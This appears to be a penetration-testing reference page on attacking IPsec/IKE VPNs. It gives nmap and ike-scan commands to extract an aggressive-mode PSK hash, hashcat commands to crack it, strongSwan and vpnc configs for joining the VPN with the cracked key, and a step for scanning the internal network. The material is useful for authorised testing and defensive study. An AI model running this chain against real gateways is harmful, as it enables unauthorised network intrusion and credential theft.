> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/recon-enumeration/pentesting-ipsec-ike.md).

# Pentesting IPsec/IKE

**Ports:** UDP 500 (IKE), UDP 4500 (NAT-T IKE)

IPsec VPNs use Internet Key Exchange (IKE) for establishing secure tunnels. Misconfigurations can leak PSK hashes.

***

## Discovery

```bash
# UDP scan for IKE
nmap -sU -p 500,4500 $ip

# Service version
nmap -sU -p 500 -sV $ip
```

***

## ike-scan

Primary tool for IKE enumeration and attacks.

```bash
# Install
sudo apt install ike-scan
```

### Basic Enumeration

```bash
# Check if IKE is running (Main Mode)
ike-scan -M $ip
```

**Output interpretation:**

| Result                                    | Meaning                                       |
| ----------------------------------------- | --------------------------------------------- |
| `1 returned handshake; 0 returned notify` | Target is IPsec gateway, willing to negotiate |
| `0 returned handshake; 1 returned notify` | None of proposed transforms acceptable        |
| `0 returned handshake; 0 returned notify` | Not an IPsec gateway                          |

### Vendor Identification

```bash
# Fingerprint vendor via backoff timing
ike-scan -M --showbackoff $ip
```

***

## Aggressive Mode Attack (PSK Extraction)

Aggressive mode is vulnerable - it returns a hash that can be cracked offline.

```bash
# Aggressive mode with fake ID (extracts hash if server responds)
ike-scan -P -M -A -n fakeID $ip
```

**Key output to look for:**

* `ID(Type=ID_USER_FQDN, Value=...)` - reveals server's group name/ID
* `Hash(20 bytes)` - the PSK hash for cracking

### Full PSK Hash Extraction

```bash
ike-scan -P -M -A -n fakeID $ip
```

The output contains IKE PSK parameters in this format:

```
g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
```

Save the entire parameter string to a file for cracking.

### Note on Fake Hashes

> If a hash is returned even with a fake ID, the server may be sending fake hashes for any ID (security feature). However, if it cracks successfully, the hash was real.

***

## Cracking IKE-PSK Hash

```bash
# Identify hash type
hashcat --identify hash.txt
# Output: 5400 | IKE-PSK SHA1

# Crack with rockyou
hashcat -a 0 -m 5400 hash.txt /usr/share/wordlists/rockyou.txt

# MD5 variant
hashcat -a 0 -m 5300 hash.txt /usr/share/wordlists/rockyou.txt
```

### Hashcat IKE Modes

| Mode | Description  |
| ---- | ------------ |
| 5300 | IKE-PSK MD5  |
| 5400 | IKE-PSK SHA1 |

***

## Transform Enumeration

If default transforms fail, enumerate acceptable ones:

```bash
# Try different encryption/hash combos
ike-scan -M --trans=5,2,1,2 $ip  # 3DES, SHA1, MODP1024, PSK
ike-scan -M --trans=7,2,1,2 $ip  # AES-128, SHA1, MODP1024, PSK
ike-scan -M --trans=7/256,2,1,2 $ip  # AES-256
```

### Transform Format

`--trans=enc,hash,auth,group`

| Encryption | Hash     | Auth          | Group        |
| ---------- | -------- | ------------- | ------------ |
| 5 = 3DES   | 1 = MD5  | 1 = PSK       | 1 = MODP768  |
| 7 = AES    | 2 = SHA1 | 2 = RSA       | 2 = MODP1024 |
|            |          | 64221 = XAUTH | 5 = MODP1536 |

***

## Connecting to VPN

Once you have credentials:

### StrongSwan

```bash
# Install
sudo apt install strongswan

# Config files
/etc/ipsec.conf
/etc/ipsec.secrets
```

Example `/etc/ipsec.secrets`:

```
%any : PSK "cracked_password_here"
```

### vpnc

```bash
sudo apt install vpnc

# Create config
sudo vim /etc/vpnc/vpn.conf
```

Example config:

```
IPSec gateway TARGET_IP
IPSec ID group_name
IPSec secret cracked_psk
Xauth username username_here
Xauth password password_here
```

Connect:

```bash
sudo vpnc /etc/vpnc/vpn.conf
```

***

## Post-Connection

After VPN connection:

```bash
# Check new interface
ip addr

# Re-scan internal network
nmap -sC -sV TARGET_INTERNAL_IP
```

***

## References

* <https://book.hacktricks.xyz/network-services-pentesting/ipsec-ike-vpn-pentesting>
* ike-scan documentation


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-ipsec-ike.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.